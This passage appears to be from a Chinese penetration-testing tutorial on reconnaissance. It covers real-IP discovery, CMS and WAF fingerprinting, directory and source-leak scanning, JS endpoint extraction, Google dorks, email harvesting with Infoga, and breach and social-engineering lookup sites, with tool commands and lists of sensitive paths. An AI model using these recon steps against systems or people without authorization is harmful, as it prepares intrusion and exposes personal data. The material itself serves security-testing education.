    7. 利用網站漏洞(XSS、命令執(zhí)行、SSRF、php探針、phpinfo頁面等) 可以通過一些頁面和漏洞獲取到服務器ip地址也是可能的。

    主動收集

    1. 小米范WEB查找器:http://pan.baidu.com/s/1pLjaQKF
    2. nslookup

    被動收集

    1. 國外ping:https://tools.ipip.net/newping.php
    2. 國外ping:https://asm.ca.com/en/ping.php
    3. shodan:https://www.shodan.io/
    4. fofa:https://fofa.so/
    5. zoomeye:https://www.zoomeye.org/

    域名解析記錄

    1. dnsdb:https://www.dnsdb.io/zh-cn/
    2. NETCRAFT:https://sitereport.netcraft.com/?url=
    3. viewdns:https://viewdns.info/
    4. threatbook:https://x.threatbook.cn/
    5. securitytrails:https://securitytrails.com/

    世界各地DNS服務器地址大全:http://www.ab173.com/dns/dns_world.php

    網站架構

    操作系統(tǒng)

    查詢方式

    被動:

    1. wappalyzer插件
    2. 云悉

    主動

    1. Nmap
    2. 手動探測 Linux大小寫敏感

      Windows大小寫不敏感

    中間件,Web容器:

    1. wappalyzer插件
    2. 云悉

    數(shù)據(jù)庫,編程語言:

    1. wappalyzer
    2. 云悉

    WEB應用層


    敏感目錄及敏感信息、源碼泄露

    方法:

    1. 御劍
    2. 搜索引擎
    3. BBscan:https://github.com/lijiejie/BBScan
    4. GSlL:https://github.com/FeeiCN/GSIL
    5. GetHub:https://github.com
    6. 御劍后臺掃描珍藏版
    7. DirBuster
    8. 7kbscan-WebPathBrute 1.6.2:
    9. WVS 1.24.001

    工具使用

    御劍:
    御劍這款工具主要用于掃描網站的敏感目錄、敏感文件。這里必須要說明一下字典必須要足夠強大才可以掃到別人發(fā)現(xiàn)不了的點。因此我們必須完善一下自己的字典。

    敏感目錄:robots.txt、crossdomin.xml、sitemap.xml、源碼泄漏文件、/WEB-INF/

    搜索引擎:

    搜索引擎也可以用于搜索網站的敏感目錄、敏感文件和敏感信息。

    這里就必須提一下搜索引擎的語法了,這里以google 黑客語法為例,語法同樣適用于百度搜索引擎。

    基本語法:

     "" 雙引號表示強制搜索
     - 表示搜索不包含關鍵詞的網頁
     | 或者的意思
     site 指定域名
     intext 搜索到的網頁正文部分包含關鍵詞
     intitle 搜索到的網頁標題包含關鍵詞
     cache 搜索關于某些內容的緩存
     definne 搜索某個詞語的定義
     filetype 搜索指定的文件類型
     info 查找指定站點的一些基本信息
     inurl 搜索包含關鍵詞的URL
     link 可以返回所有和baidu.com做了鏈接的URL

    BBscan:

    BBscan是一款信息泄漏批量掃描腳本。它是依舊還是由lijiejie大佬用python寫的安全工具。

    在windows平臺運行需要解決依賴問題:

    pip install -r requirements.txt

    使用命令:

    1. 掃描單個web服務 www.target.com python BBScan.py --host www.target.com
    2. 掃描www.target.com和www.target.com/28下的其他主機 python BBScan.py --host www.target.com --network 28
    3. 掃描txt文件中的所有主機 python BBScan.py -f wandoujia.com.txt
    4. 從文件夾中導入所有的主機并掃描 python BBScan.py -d targets/ --browser
    5. 如果是為了去各大src刷漏洞,可以考慮把所有域名保存到targets文件夾下,然后
      1. python BBScan.py -d targets/ --network 30

    GSIL:

    GSIL是一款由python3寫的從github上尋找敏感文件的安全工具。

    先安裝一下環(huán)境

    pip install -r requirements.txt

    用法:

    # 啟動測試
    $ python3 gsil.py test
    # 測試token有效性
    $ python3 gsil.py --verify-tokens

    旁站收集

    1. 站長之家:http://s.tool.chinaz.com/same
    2. Tscan:https://scan.top15.cn/web/

    C段收集

    C端是和目標服務器ip處在同一個C段的其它服務器

    查詢方式

    北極熊掃描器

    Nmap

    北極熊掃描器掃C端:http://www.xitongzhijia.net/soft/71774.html

    指紋識別

    指紋是什么:

    指定路徑下指定名稱的js文件或代碼。
    
    指定路徑下指定名稱的css文件或代碼。
    
    <title>中的內容,有些程序標題中會帶有程序標識
    
    meta標記中帶程序標識<meta name=”description”/><meta name=”keywords”/><meta name=”generator”/><meta name=”author”/><meta name=”copyright”/>中帶程序標識。
    
    display:none中的版權信息。
    
    頁面底部版權信息,關鍵字? Powered by等。
    
    readme.txt、License.txt、help.txt等文件。
    
    指定路徑下指定圖片文件,如一些小的圖標文件,后臺登錄頁面中的圖標文件等,一般管理員不會修改它們。
    
    注釋掉的html代碼中<!–
    
    http頭的X-Powered-By中的值,有的應用程序框架會在此值輸出。
    
    cookie中的關鍵字
    
    robots.txt文件中的關鍵字
    
    404頁面
    
    302返回時的旗標

    通過識別目標網站所使用的CMS信息,可以幫助我們進一步了解滲透測試環(huán)境,可以利用已知的一些CMS漏洞來進行攻擊。

    識別方式:

    主動收集

    1. CMSeeK:https://github.com/Tuhinshubhra/CMSeeK
    2. CMSmap:https://github.com/Dionach/CMSmap
    3. ACMSDiscovery:https://github.com/aedoo/ACMSDiscovery
    4. TideFinger:https://github.com/TideSec/TideFinger
    5. AngelSword:https://github.com/Lucifer1993/AngelSword

    被動收集

    1. 云悉
    2. wappalyzer插件
    3. TideFinger:http://finger.tidesec.net/
    4. BugScaner:http://whatweb.bugscaner.com/look/
    5. 數(shù)字觀星:https://fp.shuziguanxing.com/#/

    WAF判斷

    WAF也稱Web應用防護系統(tǒng),Web應用防火墻是通過執(zhí)行一系列針對HTTP/HTTPS的安全策略來專門為Web應用提供保護的一款產品。

    原理:WAF識別大多基于Headers頭信息。通過發(fā)送惡意的內容,對比響應,尋找數(shù)據(jù)包被攔截、拒絕或者檢測到的標識。

    第三方判斷:

    1. Tscan:https://scan.top15.cn/web/

    手工判斷

    Nmap判斷:兩種腳本

    一種是:

    http-waf-detect

    一種是:
    http-waf-fingerprint

    wafw00f:https://github.com/EnableSecurity/wafw00f


    企業(yè):


    天眼查地址:https://www.tianyancha.com/

    企業(yè)信用信息公示系統(tǒng):http://www.gsxt.gov.cn/index.html

    悉知-全國企業(yè)信息查詢:https://company.xizhi.com/

    信用中國:https://www.creditchina.gov.cn/


    收集其他敏感信息:


    源碼泄露

    常見源碼泄露:

    /.bzr/
    /CVS/Entries
    /CVS/Root
    /.DS_Store MacOS自動生成
    /.hg/
    /.svn/ (/.svn/entries)
    /.git/
    /WEB-INF/src/
    /WEB-INF/lib/
    /WEB-INF/classes/
    /WEB-INF/database.properties
    /WEB-INF/web.xml
    Robots.txt

    源碼泄露利用工具:

    1. git源碼泄露:https://github.com/lijiejie/GitHack
    2. .DS_Store泄露:https://github.com/lijiejie/ds_store_exp
    3. .bzr、CVS、.svn、.hg源碼泄露:https://github.com/kost/dvcs-ripper

    備份文件泄露

    網站備份文件泄露常見名稱:

    backup
    db
    data
    web
    wwwroot
    database
    www
    code
    test
    admin
    user
    sql

    網站備份文件泄露常見后綴:

    .bak
    .html
    _index.html
    .swp
    .rar
    .txt
    .zip
    .7z
    .sql
    .tar.gz
    .tgz
    .tar.bak
    .html
    _index.html
    .swp
    .rar
    .txt
    .zip
    .7z
    .sql
    .tar.gz
    .tgz
    .tar

    常見的掃描工具就和目錄掃描的工具差不多

    JS獲取敏感接口:

    工具:JSFinder

    SFinder是一款用作快速在網站的js文件中提取URL,子域名的工具。

    安裝:

    pip3 install requests bs4
    git clone https://github.com/Threezh1/JSFinder.git

    使用:

    python3 JSFinder.py -u http://www.mi.com
    python3 JSFinder.py -u http://www.mi.com -d

    工具:LinkFinder

    該工具通過網站中的JS文件來發(fā)現(xiàn)服務端、敏感信息、隱藏控制面板的URL鏈接等有用信息,可最大化地提高URL發(fā)現(xiàn)效率

    安裝:

    git clone https://github.com/GerbenJavado/LinkFinder.git
    cd LinkFinder
    python2 setup.py install

    使用:

    在線JavaScript文件中查找端點的最基本用法,并將結果輸出到results.html:

    python linkfinder.py -i https://example.com/1.js -o results.html

    CLI輸出(不使用jsbeautifier,這使得它非常快):
    pyhon linkfinder.py -i https://example.com/1.js -o cli

    分析整個域及其JS文件:

    python linkfinder.py -i https://example.com -d

    Burp輸入(在目標中選擇要保存的文件,右鍵單擊,Save selected items將該文件作為輸入):

    python linkfinder.py -i burpfile -b

    枚舉JavaScript文件的整個文件夾,同時查找以/ api /開頭的終結點,并最終將結果保存到results.html:

    python linkfinder.py -i 'Desktop/*.js' -r ^/api/ -o results.html

    目錄掃描

    常用工具:

    1. 7kbscan-WebPathBrute:https://github.com/7kbstorm/7kbscan-WebPathBrute
    2. DirMap:https://github.com/H4ckForJob/dirmap
    3. dirsearch: https://github.com/maurosoria/dirsearch
    4. Fuzz-gobuster:https://github.com/OJ/gobuster
    5. Fuzz-dirbuster OWASP (kali自帶)
    6. Fuzz-wfuzzhttps://github.com/xmendez/wfuzz
    7. 御劍

    獲取公開文件

    工具

    snitch:

    Snitch可以針對指定域自動執(zhí)行信息收集過程。此工具可幫助收集可通過Web搜索引擎找到的指定信息。在滲透測試的早期階段,它可能非常有用。

    安裝:

    git clone https://github.com/Smaash/snitch.git

    使用:

    python2.7 snitch.py -C "site:whitehouse.gov filetype:pdf" -P 100

    Google Hacking

    site:域名 filetype:.doc | .docx | .xls | .xlsx | .ppt | .pptx | .odt | .pdf | .rtf | .sxw | .psw | .csv

    郵箱信息收集

    工具

    Infoga:

    Infoga可從不同的公共源網絡(搜索引擎,pgp密鑰服務器和shodan)收集電子郵件帳戶信息(ip,主機名,國家/地區(qū)…)。是一個用法非常簡單的工具,但是,對于滲透測試的早期階段,或者只是為了了解自己公司在互聯(lián)網上的可見性是非常有效的。

    安裝:

    git clone https://github.com/m4ll0k/Infoga.git /data/infoga
    cd /data/infoga
    pip3 install requests
    python3 infoga.py

    使用:

    python3 infoga.py --domain site.com --source all -v 3 | grep Email | cut -d ' ' -f 3 | uniq | sed -n '/-/!p'
    python3 infoga.py --info emailtest@site.com
    python3 infoga.py --info emailtest@site.com -b

    Online Search Email:

    通過全球最大的幾個數(shù)據(jù)泄露站點在線查詢郵箱信息泄露情況

    https://monitor.firefox.com/

    https://haveibeenpwned.com/

    https://ghostproject.fr/

    社工工程學

    社工庫:

    https://dehashed.com/

    https://aleph.occrp.org/

    https://www.blackbookonline.info/

    注冊信息

    通過用戶的一些信息(Mail、Name、ID、Tel)查詢用戶注冊過哪些應用

    https://www.reg007.com/

    https://checkusernames.com/

    https://knowem.com/

    https://namechk.com/

    IP定位

    https://chaipip.com/ip.php

    https://www.opengps.cn/Data/IP/LocHighAcc.aspx

    https://www.ipip.net/ip.html

    https://www.ip2location.com/demo/

    https://www.maxmind.com/en/geoip2-precision-demo

    https://www.ip138.com/

    社會工程學工具包

    地址:https://github.com/trustedsec/social-engineer-toolkit

    工具的使用教程我并沒有發(fā)全,建議大家可以自己去多研究研究

網站首頁   |    關于我們   |    公司新聞   |    產品方案   |    用戶案例   |    售后服務   |    合作伙伴   |    人才招聘   |   

友情鏈接: 餐飲加盟

地址:北京市海淀區(qū)    電話:010-     郵箱:@126.com

備案號:冀ICP備2024067069號-3 北京科技有限公司版權所有